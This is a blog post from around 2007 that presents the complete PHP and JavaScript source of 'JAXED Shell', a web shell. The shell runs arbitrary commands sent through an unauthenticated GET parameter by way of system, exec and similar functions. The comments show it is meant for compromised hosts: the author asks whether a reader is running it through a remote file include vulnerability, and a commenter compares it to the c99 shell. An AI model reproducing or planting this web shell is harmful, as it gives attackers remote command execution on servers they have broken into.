Dec 19

A while back when I was first learning AJAX, I decided I wanted to write an interactive PHP/JavaScript shell for executing commands, etc. All the other ones I found either didn't handle directories well, were way too bulky or were backdoored. So, I now present to you JAXED Shell. I haven't extensively tested it, but it should work in the majority of situations.

Enjoy :)
Commands:

home - return to shell's home directory
clear - clear history box
up/down arrow - go through previous commands
right arrow - file name completion 

@session_start();
$_SESSION['work_dir'] = ($_SESSION['work_dir'] != ") ? $_SESSION['work_dir'] : getcwd();
$tmp_wd = $_SESSION['work_dir'];
if(count(get_included_files()) > 1 || count(get_included_files()) > 1) list($me) = explode('&', $_SERVER['REQUEST_URI']);
else $me = $_SERVER['SCRIPT_NAME'] . '?';
function get_exec_function(){
	$exec_functions = array('popen', 'exec', 'shell_exec', 'system', 'passthru');
	foreach($exec_functions as $f) if(strpos(ini_get('disable_functions'), $f) === false) return $f;
}
function execute_command($exec_function, $command){
	$command = $command . " 2>&1";
	switch($exec_function){
		case 'popen': $h = popen($command, 'r'); while(!feof($h)) echo(fgets($h)); break;
		case 'exec': exec($command, $result); foreach($result as $r) echo($r . "\\n"); break;
		case 'shell_exec': echo(shell_exec($command)); break;
		case 'system': system($command); break;
		case 'passthru': passthru($command); break;
	}
}
if(@$_GET['ajxcmd']){
	@set_time_limit(4);
	$cmd = (ini_get('magic_quotes_gpc')) ? stripslashes(urldecode($_GET['ajxcmd'])) : urldecode($_GET['ajxcmd']);
	if($cmd == 'home') $_SESSION['work_dir'] = getcwd();
	elseif($exec_function = get_exec_function()){
		if(strpos($cmd, 'cd') === 0){
			$c = array_pop(explode(' ', $cmd));
			if(@is_dir($_SESSION['work_dir'] . DIRECTORY_SEPARATOR . $c) && $c[0] != '\\\\' && $c[0] != '//') $_SESSION['work_dir'] .= DIRECTORY_SEPARATOR . $c;
			elseif(@is_dir($c) && $c[0] != '.') $_SESSION['work_dir'] = $c;
			else echo("Invalid directory\\n");
		}
		else{
			@chdir($_SESSION['work_dir']);
			execute_command($exec_function, $cmd);
		}
	}
	else die('All execution methods disabled.');
}
elseif(@$_GET['qf']){
	@set_time_limit(4);
	$qf = (ini_get('magic_quotes_gpc')) ? stripslashes(urldecode($_GET['qf'])) : urldecode($_GET['qf']);
	@chdir($_SESSION['work_dir']);
	$res = glob($qf . "*");
	foreach($res as $file){
		echo($file . (count($res) > 1 ? "\\t" : ""));
	}
}
elseif(@$_GET['dr']){
	echo($_SESSION['work_dir']);
}
else{?>
<head>
<title>JAXED Shell</title>
<style>
body { background-color:#000000; color:#BFBFBF; font-family:Verdana; font-size:11px; }
input,textarea { color:#BFBFBF; background-color:#000000; border:1px solid #3F3F3F; font-family:Courier; font-size:11px; width:100%; }
textarea { border:0px; overflow: auto;height:90%; }
</style>
<script>
var http = null;
var hist = new Array();
var i = -1;
var qfpat = "";
function char(e){
	if(window.event) k = e.keyCode;
	else if(e.which) k = e.which;
	if(k ==  13){
		cmd = document.getElementById('c').value;
		if(cmd == 'clear') document.getElementById('history').value = ";
		else if(document.getElementById('c').value != ") x('ajxcmd', escape(cmd), handle_exec);
		hist.push(document.getElementById('c').value);
		document.getElementById('c').value = ";
	}
	else if(k == 38){ if(i < hist.length-1) i++; }
	else if(k == 39){
		qfpat = document.getElementById('c').value.split(" ").pop();
		if(qfpat != ""){
			x('qf', escape(qfpat), handle_qf);
		}
	}
	else if(k == 40){ if(i > -1) i–; }
	if(k==38 || k==40){ document.getElementById('c').value = (hist[hist.length-1-i] != undefined) ? hist[hist.length-1-i] : "; }
}
function x(variable, value, handle_response){
	if (window.XMLHttpRequest) http = new XMLHttpRequest();
	else if (window.ActiveXObject) http = new ActiveXObject("Microsoft.XMLHTTP");
	if(http){
		http.onreadystatechange = handle_response;
		http.open("GET", "<?php echo($me); ?>" + "&" + variable + "=" + value, true);
		http.send(null);
	}
	else alert('Unabled to create XMLHttpRequest object');
}
function handle_qf(){
	if(http.readyState == 4){
		var tmp = document.getElementById('c').value;
		if(http.responseText.split("\\t").length == 1){
			var r = new RegExp(document.getElementById('c').value.split(" ").pop() + "$");
			document.getElementById('c').value = tmp.replace(r, http.responseText);
		}
		document.getElementById('history').value += '# ' + qfpat + '\\n' + http.responseText + '\\n';
		document.getElementById('history').scrollTop = document.getElementById('history').scrollHeight;
	}
}
function handle_exec(){
	if(http.readyState == 4){
		var r2 = /<<\\(.*?\\)>>/;
		var y = http.responseText.match(/<<\\((.*?)\\)>>/g);
		if(y){
			var y2 = y[0].match(/<<\\((.+)\\)>>/)[1];
			document.getElementById('dir').value = y2;
		}
		document.getElementById('history').value += '# ' + cmd + '\\n' + http.responseText.replace(r2, "");
		document.getElementById('history').scrollTop = document.getElementById('history').scrollHeight;
	}
}
</script></head>
<body onLoad="document.getElementById('c').focus(); document.getElementById('history').scrollTop = document.getElementById('history').scrollHeight;">
<input type="text" id="c" onKeyDown="char(event);" style="width:70%;"><input type="text" id="dir" style="width:30%;"readonly><br><textarea id="history"></textarea>
</body></html>
<?php }
if($_SESSION['work_dir'] != $tmp_wd) echo("<<(" . realpath($_SESSION['work_dir']) . ")>>");
  • Digg
  • StumbleUpon
  • del.icio.us
  • Reddit
Posted in Javascript, PHP, Security |

6 Responses

  1. Tuareg Says:
    December 21st, 2007 at 1:12 am

    Hey I just Tried your JAxed Shell in a Linux server but it does'nt work, when I tried the help command, I get an 404 error….and other commands like pwd or just whoami just gave me a 406 error, but in a c99 shell actually I can use these commands then I don't know what's going on

  2. admin Says:
    December 21st, 2007 at 2:09 pm

    Are you using it within a remote file include vulnerability or have you uploaded the file?

  3. Tuareg Says:
    December 23rd, 2007 at 1:59 am

    I uploaded the file

  4. admin Says:
    December 23rd, 2007 at 11:49 am

    Hmm.. I'm not quite sure what the problem is. Probably all the command execution methods are disabled or some server setting is preventing it. That or you have JavaScript disabled. It works fine for me on my BSD box, so I don't think it's *nix in general.

  5. tr3intaydos Says:
    December 23rd, 2007 at 10:02 pm

    i tested it in windows and xampp and it works great

  6. Tuareg Says:
    December 24th, 2007 at 1:12 am

    mmmm I tried the Jaxed shell in an un protected *nix system in wich it's allowed the remote execution of commands and when I tried it the Javascript were enabled, then I actually don't know what's going on…. but I think that it's a cool idea a shell based on Ajax an PHP.

Leave a Comment

Please note: Comment moderation is enabled and may delay your comment. There is no need to resubmit your comment.